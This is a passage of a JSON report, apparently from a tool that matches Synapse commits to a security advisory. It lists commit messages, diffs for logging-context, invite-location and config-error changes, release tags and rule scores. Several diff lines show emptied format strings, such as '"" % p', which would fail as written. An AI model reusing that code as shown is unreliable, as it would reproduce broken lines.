BackgroundProcessLoggingContext(desc) as context:", - "- context.request = \"%s-%i\" % (desc, count)", - "+ with BackgroundProcessLoggingContext(desc, \"%s-%i\" % (desc, count)) as context:", - " try:", - "@@ -246,4 +245,4 @@ class BackgroundProcessLoggingContext(LoggingContext):", - "- def __init__(self, name: str):", - "- super().__init__(name)", - "+ def __init__(self, name: str, request: Optional[str] = None):", - "+ super().__init__(name, request=request)", - "diff --git a/synapse/replication/tcp/protocol.py b/synapse/replication/tcp/protocol.py", - "index a509e599c..804da994e 100644", - "--- a/synapse/replication/tcp/protocol.py", - "+++ b/synapse/replication/tcp/protocol.py", - "@@ -174,4 +174,3 @@ class BaseReplicationStreamProtocol(LineOnlyReceiver):", - " ctx_name = \"replication-conn-%s\" % self.conn_id", - "- self._logging_context = BackgroundProcessLoggingContext(ctx_name)", - "- self._logging_context.request = ctx_name", - "+ self._logging_context = BackgroundProcessLoggingContext(ctx_name, ctx_name)", - "diff --git a/tests/handlers/test_federation.py b/tests/handlers/test_federation.py", - "index d0452e149..0b24b89a2 100644", - "--- a/tests/handlers/test_federation.py", - "+++ b/tests/handlers/test_federation.py", - "@@ -128,3 +128,3 @@ class FederationTestCase(unittest.HomeserverTestCase):", - "- with LoggingContext(request=\"send_rejected\"):", - "+ with LoggingContext(\"send_rejected\"):", - " d = run_in_background(self.handler.on_receive_pdu, OTHER_SERVER, ev)", - "@@ -180,3 +180,3 @@ class FederationTestCase(unittest.HomeserverTestCase):", - "- with LoggingContext(request=\"send_rejected\"):", - "+ with LoggingContext(\"send_rejected\"):", - " d = run_in_background(self.handler.on_receive_pdu, OTHER_SERVER, ev)", - "@@ -200,3 +200,3 @@ class FederationTestCase(unittest.HomeserverTestCase):", - " join_event.signatures[other_server] = {\"x\": \"y\"}", - "- with LoggingContext(request=\"send_join\"):", - "+ with LoggingContext(\"send_join\"):", - " d = run_in_background(", - "diff --git a/tests/logging/test_terse_json.py b/tests/logging/test_terse_json.py", - "index f6e7e5fda..48a74e2ee 100644", - "--- a/tests/logging/test_terse_json.py", - "+++ b/tests/logging/test_terse_json.py", - "@@ -119,7 +119,6 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " handler.setFormatter(JsonFormatter())", - "- handler.addFilter(LoggingContextFilter(request=\"\"))", - "+ handler.addFilter(LoggingContextFilter())", - " logger = self.get_logger(handler)", - "- with LoggingContext() as context_one:", - "- context_one.request = \"test\"", - "+ with LoggingContext(request=\"test\"):", - " logger.info(\"Hello there, %s!\", \"wally\")", - "@@ -134,3 +133,2 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " \"request\",", - "- \"scope\",", - " ]", - "@@ -139,2 +137 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " self.assertEqual(log[\"request\"], \"test\")", - "- self.assertIsNone(log[\"scope\"])", - "diff --git a/tests/test_federation.py b/tests/test_federation.py", - "index fa45f8b3b..fc9aab32d 100644", - "--- a/tests/test_federation.py", - "+++ b/tests/test_federation.py", - "@@ -136,3 +136,3 @@ class MessageAcceptTests(unittest.HomeserverTestCase):", - "- with LoggingContext(request=\"lying_event\"):", - "+ with LoggingContext():", - " failure = self.get_failure(", - "diff --git a/tests/test_utils/logging_setup.py b/tests/test_utils/logging_setup.py", - "index fdfb840b6..52ae5c571 100644", - "--- a/tests/test_utils/logging_setup.py", - "+++ b/tests/test_utils/logging_setup.py", - "@@ -50,3 +50,3 @@ def setup_logging():", - " handler.setFormatter(formatter)", - "- handler.addFilter(LoggingContextFilter(request=\"\"))", - "+ handler.addFilter(LoggingContextFilter())", - " root_logger.addHandler(handler)" - ], - "changed_files": [ - "changelog.d/8916.misc", - "changelog.d/8935.misc", - "synapse/config/logger.py", - "synapse/http/site.py", - "synapse/logging/context.py", - "synapse/metrics/background_process_metrics.py", - "synapse/replication/tcp/protocol.py", - "tests/handlers/test_federation.py", - "tests/logging/test_terse_json.py", - "tests/test_federation.py", - "tests/test_utils/logging_setup.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8935": "Add type hints to the logging context code. #8939 Regression in log context tracking #9048" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8935, 8935", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: federation", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8935", - "relevance": 2 - } - ] - }, - { - "commit_id": "56e00ca85e502247112a95ab8c452c83ab5fc4b0", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608307317, - "hunks": 6, - "message": "Send the location of the web client to the IS when inviting via 3PIDs. (#8930) Adds a new setting `email.invite_client_location` which, if defined, is passed to the identity server during invites.", - "diff": [ - "diff --git a/changelog.d/8930.feature b/changelog.d/8930.feature", - "new file mode 100644", - "index 000000000..cb305b526", - "--- /dev/null", - "+++ b/changelog.d/8930.feature", - "@@ -0,0 +1 @@", - "+Add an `email.invite_client_location` configuration option to send a web client location to the invite endpoint on the identity server which allows customisation of the email template.", - "diff --git a/docs/sample_config.yaml b/docs/sample_config.yaml", - "index 077cb619c..0b4dd115f 100644", - "--- a/docs/sample_config.yaml", - "+++ b/docs/sample_config.yaml", - "@@ -2151,2 +2151,8 @@ email:", - "+ # The web client location to direct users to during an invite. This is passed", - "+ # to the identity server as the org.matrix.web_client_location key. Defaults", - "+ # to unset, giving no guidance to the identity server.", - "+ #", - "+ #invite_client_location: https://app.element.io", - "+", - " # Directory in which Synapse will try to find the template files below.", - "diff --git a/synapse/config/emailconfig.py b/synapse/config/emailconfig.py", - "index 7c8b64d84..d4328c46b 100644", - "--- a/synapse/config/emailconfig.py", - "+++ b/synapse/config/emailconfig.py", - "@@ -324,2 +324,18 @@ class EmailConfig(Config):", - "+ # The invite client location should be a HTTP(S) URL or None.", - "+ self.invite_client_location = email_config.get(\"invite_client_location\") or None", - "+ if self.invite_client_location:", - "+ if not isinstance(self.invite_client_location, str):", - "+ raise ConfigError(", - "+ \"Config option email.invite_client_location must be type str\"", - "+ )", - "+ if not (", - "+ self.invite_client_location.startswith(\"http://\")", - "+ or self.invite_client_location.startswith(\"https://\")", - "+ ):", - "+ raise ConfigError(", - "+ \"Config option email.invite_client_location must be a http or https URL\",", - "+ path=(\"email\", \"invite_client_location\"),", - "+ )", - "+", - " def generate_config_section(self, config_dir_path, server_name, **kwargs):", - "@@ -391,2 +407,8 @@ class EmailConfig(Config):", - "+ # The web client location to direct users to during an invite. This is passed", - "+ # to the identity server as the org.matrix.web_client_location key. Defaults", - "+ # to unset, giving no guidance to the identity server.", - "+ #", - "+ #invite_client_location: https://app.element.io", - "+", - " # Directory in which Synapse will try to find the template files below.", - "diff --git a/synapse/handlers/identity.py b/synapse/handlers/identity.py", - "index 7301c2471..c05036ad1 100644", - "--- a/synapse/handlers/identity.py", - "+++ b/synapse/handlers/identity.py", - "@@ -57,2 +57,4 @@ class IdentityHandler(BaseHandler):", - "+ self._web_client_location = hs.config.invite_client_location", - "+", - " async def threepid_from_creds(", - "@@ -805,2 +807,5 @@ class IdentityHandler(BaseHandler):", - " }", - "+ # If a custom web client location is available, include it in the request.", - "+ if self._web_client_location:", - "+ invite_config[\"org.matrix.web_client_location\"] = self._web_client_location" - ], - "changed_files": [ - "changelog.d/8930.feature", - "docs/sample_config.yaml", - "synapse/config/emailconfig.py", - "synapse/handlers/identity.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8930": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8930, 8930", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: setting, server", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8930", - "relevance": 2 - } - ] - }, - { - "commit_id": "ab7a24cc6bbffa5ba67b42731c45b1d4d33f3ae3", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607436275, - "hunks": 31, - "message": "Better formatting for config errors from modules (#8874) The idea is that the parse_config method of extension modules can raise either a ConfigError or a JsonValidationError, and it will be magically turned into a legible error message. There's a few components to it: * Separating the \"path\" and the \"message\" parts of a ConfigError, so that we can fiddle with the path bit to turn it into an absolute path. * Generally improving the way ConfigErrors get printed. * Passing in the config path to load_module so that it can wrap any exceptions that get caught appropriately.", - "diff": [ - "diff --git a/changelog.d/8874.feature b/changelog.d/8874.feature", - "new file mode 100644", - "index 000000000..720665eca", - "--- /dev/null", - "+++ b/changelog.d/8874.feature", - "@@ -0,0 +1 @@", - "+Improve the error messages printed as a result of configuration problems for extension modules.", - "diff --git a/synapse/app/homeserver.py b/synapse/app/homeserver.py", - "index 2b5465417..bbb740783 100644", - "--- a/synapse/app/homeserver.py", - "+++ b/synapse/app/homeserver.py", - "@@ -21,3 +21,3 @@ import os", - " import sys", - "-from typing import Iterable", - "+from typing import Iterable, Iterator", - "@@ -92,3 +92,3 @@ class SynapseHomeServer(HomeServer):", - " if site_tag is None:", - "- site_tag = port", - "+ site_tag = str(port)", - "@@ -109,3 +109,6 @@ class SynapseHomeServer(HomeServer):", - " for path, resmodule in additional_resources.items():", - "- handler_cls, config = load_module(resmodule)", - "+ handler_cls, config = load_module(", - "+ resmodule,", - "+ (\"listeners\", site_tag, \"additional_resources\", \"<%s>\" % (path,)),", - "+ )", - " handler = handler_cls(config, module_api)", - "@@ -344,3 +347,6 @@ def setup(config_options):", - " except ConfigError as e:", - "- sys.stderr.write(\"\\nERROR: %s\\n\" % (e,))", - "+ sys.stderr.write(\"\\n\")", - "+ for f in format_config_error(e):", - "+ sys.stderr.write(f)", - "+ sys.stderr.write(\"\\n\")", - " sys.exit(1)", - "@@ -447,2 +453,34 @@ def setup(config_options):", - "+def format_config_error(e: ConfigError) -> Iterator[str]:", - "+ \"\"\"", - "+ Formats a config error neatly", - "+", - "+ The idea is to format the immediate error, plus the \"causes\" of those errors,", - "+ hopefully in a way that makes sense to the user. For example:", - "+", - "+ Error in configuration at 'oidc_config.user_mapping_provider.config.display_name_template':", - "+ Failed to parse config for module 'JinjaOidcMappingProvider':", - "+ invalid jinja template:", - "+ unexpected end of template, expected 'end of print statement'.", - "+", - "+ Args:", - "+ e: the error to be formatted", - "+", - "+ Returns: An iterator which yields string fragments to be formatted", - "+ \"\"\"", - "+ yield \"Error in configuration\"", - "+", - "+ if e.path:", - "+ yield \" at '%s'\" % (\".\".join(e.path),)", - "+", - "+ yield \":\\n %s\" % (e.msg,)", - "+", - "+ e = e.__cause__", - "+ indent = 1", - "+ while e:", - "+ indent += 1", - "+ yield \":\\n%s%s\" % (\" \" * indent, str(e))", - "+ e = e.__cause__", - "+", - "+", - " class SynapseService(service.Service):", - "diff --git a/synapse/config/_base.py b/synapse/config/_base.py", - "index 85f65da4d..2931a8820 100644", - "--- a/synapse/config/_base.py", - "+++ b/synapse/config/_base.py", - "@@ -25,3 +25,3 @@ from hashlib import sha256", - " from textwrap import dedent", - "-from typing import Any, Callable, List, MutableMapping, Optional", - "+from typing import Any, Callable, Iterable, List, MutableMapping, Optional", - "@@ -34,3 +34,13 @@ import yaml", - " class ConfigError(Exception):", - "- pass", - "+ \"\"\"Represents a problem parsing the configuration", - "+", - "+ Args:", - "+ msg: A textual description of the error.", - "+ path: Where appropriate, an indication of where in the configuration", - "+ the problem lies.", - "+ \"\"\"", - "+", - "+ def __init__(self, msg: str, path: Optional[Iterable[str]] = None):", - "+ self.msg = msg", - "+ self.path = path", - "diff --git a/synapse/config/_base.pyi b/synapse/config/_base.pyi", - "index b8faafa9b..ed26e2fb6 100644", - "--- a/synapse/config/_base.pyi", - "+++ b/synapse/config/_base.pyi", - "@@ -1,2 +1,2 @@", - "-from typing import Any, List, Optional", - "+from typing import Any, Iterable, List, Optional", - "@@ -37,3 +37,6 @@ from synapse.config import (", - "-class ConfigError(Exception): ...", - "+class ConfigError(Exception):", - "+ def __init__(self, msg: str, path: Optional[Iterable[str]] = None):", - "+ self.msg = msg", - "+ self.path = path", - "diff --git a/synapse/config/_util.py b/synapse/config/_util.py", - "index c74969a97..1bbe83c31 100644", - "--- a/synapse/config/_util.py", - "+++ b/synapse/config/_util.py", - "@@ -40,12 +40,25 @@ def validate_config(", - " except jsonschema.ValidationError as e:", - "- # copy `config_path` before modifying it.", - "- path = list(config_path)", - "- for p in list(e.path):", - "- if isinstance(p, int):", - "- path.append(\"\" % p)", - "- else:", - "- path.append(str(p))", - "-", - "- raise ConfigError(", - "- \"Unable to parse configuration: %s at %s\" % (e.message, \".\".join(path))", - "- )", - "+ raise json_error_to_config_error(e, config_path)", - "+", - "+", - "+def json_error_to_config_error(", - "+ e: jsonschema.ValidationError, config_path: Iterable[str]", - "+) -> ConfigError:", - "+ \"\"\"Converts a json validation error to a user-readable ConfigError", - "+", - "+ Args:", - "+ e: the exception to be converted", - "+ config_path: the path within the config file. This will be used as a basis", - "+ for the error message.", - "+", - "+ Returns:", - "+ a ConfigError", - "+ \"\"\"", - "+ # copy `config_path` before modifying it.", - "+ path = list(config_path)", - "+ for p in list(e.path):", - "+ if isinstance(p, int):", - "+ path.append(\"\" % p)", - "+ else:", - "+ path.append(str(p))", - "+ return ConfigError(e.message, path)", - "diff --git a/synapse/config/oidc_config.py b/synapse/config/oidc_config.py", - "index 69d188341..1abf8ed40 100644", - "--- a/synapse/config/oidc_config.py", - "+++ b/synapse/config/oidc_config.py", - "@@ -68,3 +68,3 @@ class OIDCConfig(Config):", - " self.oidc_user_mapping_provider_config,", - "- ) = load_module(ump_config)", - "+ ) = load_module(ump_config, (\"oidc_config\", \"user_mapping_provider\"))", - "diff --git a/synapse/config/password_auth_providers.py b/synapse/config/password_auth_providers.py", - "index 4fda8ae98..85d07c4f8 100644", - "--- a/synapse/config/password_auth_providers.py", - "+++ b/synapse/config/password_auth_providers.py", - "@@ -38,3 +38,3 @@ class PasswordAuthProviderConfig(Config):", - " providers.extend(config.get(\"password_providers\") or [])", - "- for provider in providers:", - "+ for i, provider in enumerate(providers):", - " mod_name = provider[\"module\"]", - "@@ -47,3 +47,4 @@ class PasswordAuthProviderConfig(Config):", - " (provider_class, provider_config) = load_module(", - "- {\"module\": mod_name, \"config\": provider[\"config\"]}", - "+ {\"module\": mod_name, \"config\": provider[\"config\"]},", - "+ (\"password_providers\", \"\" % i),", - " )", - "diff --git a/synapse/config/repository.py b/synapse/config/repository.py", - "index ba1e9d236..17ce9145e 100644", - "--- a/synapse/config/repository.py", - "+++ b/synapse/config/repository.py", - "@@ -144,3 +144,3 @@ class ContentRepositoryConfig(Config):", - "- for provider_config in storage_providers:", - "+ for i, provider_config in enumerate(storage_providers):", - " # We special case the module \"file_system\" so as not to need to", - "@@ -153,3 +153,5 @@ class ContentRepositoryConfig(Config):", - "- provider_class, parsed_config = load_module(provider_config)", - "+ provider_class, parsed_config = load_module(", - "+ provider_config, (\"media_storage_providers\", \"\" % i)", - "+ )", - "diff --git a/synapse/config/room_directory.py b/synapse/config/room_directory.py", - "index 92e1b6752..9a3e1c3e7 100644", - "--- a/synapse/config/room_directory.py", - "+++ b/synapse/config/room_directory.py", - "@@ -182,3 +182,3 @@ class _RoomDirectoryRule:", - " except Exception as e:", - "- raise ConfigError(\"Failed to parse glob into regex: %s\", e)", - "+ raise ConfigError(\"Failed to parse glob into regex\") from e", - "diff --git a/synapse/config/saml2_config.py b/synapse/config/saml2_config.py", - "index c1b8e98ae..7b97d4f11 100644", - "--- a/synapse/config/saml2_config.py", - "+++ b/synapse/config/saml2_config.py", - "@@ -127,3 +127,3 @@ class SAML2Config(Config):", - " self.saml2_user_mapping_provider_config,", - "- ) = load_module(ump_dict)", - "+ ) = load_module(ump_dict, (\"saml2_config\", \"user_mapping_provider\"))", - "diff --git a/synapse/config/spam_checker.py b/synapse/config/spam_checker.py", - "index 3d067d29d..3d05abc15 100644", - "--- a/synapse/config/spam_checker.py", - "+++ b/synapse/config/spam_checker.py", - "@@ -35,9 +35,10 @@ class SpamCheckerConfig(Config):", - " # to see if the option resolves to a dictionary", - "- self.spam_checkers.append(load_module(spam_checkers))", - "+ self.spam_checkers.append(load_module(spam_checkers, (\"spam_checker\",)))", - " elif isinstance(spam_checkers, list):", - "- for spam_checker in spam_checkers:", - "+ for i, spam_checker in enumerate(spam_checkers):", - "+ config_path = (\"spam_checker\", \"\" % i)", - " if not isinstance(spam_checker, dict):", - "- raise ConfigError(\"spam_checker syntax is incorrect\")", - "+ raise ConfigError(\"expected a mapping\", config_path)", - "- self.spam_checkers.append(load_module(spam_checker))", - "+ self.spam_checkers.append(load_module(spam_checker, config_path))", - " else:", - "diff --git a/synapse/config/third_party_event_rules.py b/synapse/config/third_party_event_rules.py", - "index 10a99c792..c04e1c4e0 100644", - "--- a/synapse/config/third_party_event_rules.py", - "+++ b/synapse/config/third_party_event_rules.py", - "@@ -28,3 +28,5 @@ class ThirdPartyRulesConfig(Config):", - " if provider is not None:", - "- self.third_party_event_rules = load_module(provider)", - "+ self.third_party_event_rules = load_module(", - "+ provider, (\"third_party_event_rules\",)", - "+ )", - "diff --git a/synapse/util/module_loader.py b/synapse/util/module_loader.py", - "index 94b59afb3..1ee61851e 100644", - "--- a/synapse/util/module_loader.py", - "+++ b/synapse/util/module_loader.py", - "@@ -17,10 +17,19 @@ import importlib", - " import importlib.util", - "+import itertools", - "+from typing import Any, Iterable, Tuple, Type", - "+", - "+import jsonschema", - " from synapse.config._base import ConfigError", - "+from synapse.config._util import json_error_to_config_error", - "-def load_module(provider):", - "+def load_module(provider: dict, config_path: Iterable[str]) -> Tuple[Type, Any]:", - " \"\"\" Loads a synapse module with its config", - "- Take a dict with keys 'module' (the module name) and 'config'", - "- (the config dict).", - "+", - "+ Args:", - "+ provider: a dict with keys 'module' (the module name) and 'config'", - "+ (the config dict).", - "+ config_path: the path within the config file. This will be used as a basis", - "+ for any error message.", - "@@ -29,5 +38,12 @@ def load_module(provider):", - " \"\"\"", - "+", - "+ modulename = provider.get(\"module\")", - "+ if not isinstance(modulename, str):", - "+ raise ConfigError(", - "+ \"expected a string\", path=itertools.chain(config_path, (\"module\",))", - "+ )", - "+", - " # We need to import the module, and then pick the class out of", - " # that, so we split based on the last dot.", - "- module, clz = provider[\"module\"].rsplit(\".\", 1)", - "+ module, clz = modulename.rsplit(\".\", 1)", - " module = importlib.import_module(module)", - "@@ -35,6 +51,18 @@ def load_module(provider):", - "+ module_config = provider.get(\"config\")", - " try:", - "- provider_config = provider_class.parse_config(provider.get(\"config\"))", - "+ provider_config = provider_class.parse_config(module_config)", - "+ except jsonschema.ValidationError as e:", - "+ raise json_error_to_config_error(e, itertools.chain(config_path, (\"config\",)))", - "+ except ConfigError as e:", - "+ raise _wrap_config_error(", - "+ \"Failed to parse config for module %r\" % (modulename,),", - "+ prefix=itertools.chain(config_path, (\"config\",)),", - "+ e=e,", - "+ )", - " except Exception as e:", - "- raise ConfigError(\"Failed to parse config for %r: %s\" % (provider[\"module\"], e))", - "+ raise ConfigError(", - "+ \"Failed to parse config for module %r\" % (modulename,),", - "+ path=itertools.chain(config_path, (\"config\",)),", - "+ ) from e", - "@@ -58 +86,25 @@ def load_python_module(location: str):", - " return mod", - "+", - "+", - "+def _wrap_config_error(", - "+ msg: str, prefix: Iterable[str], e: ConfigError", - "+) -> \"ConfigError\":", - "+ \"\"\"Wrap a relative ConfigError with a new path", - "+", - "+ This is useful when we have a ConfigError with a relative path due to a problem", - "+ parsing part of the config, and we now need to set it in context.", - "+ \"\"\"", - "+ path = prefix", - "+ if e.path:", - "+ path = itertools.chain(prefix, e.path)", - "+", - "+ e1 = ConfigError(msg, path)", - "+", - "+ # ideally we would set the 'cause' of the new exception to the original exception;", - "+ # however now that we have merged the path into our own, the stringification of", - "+ # e 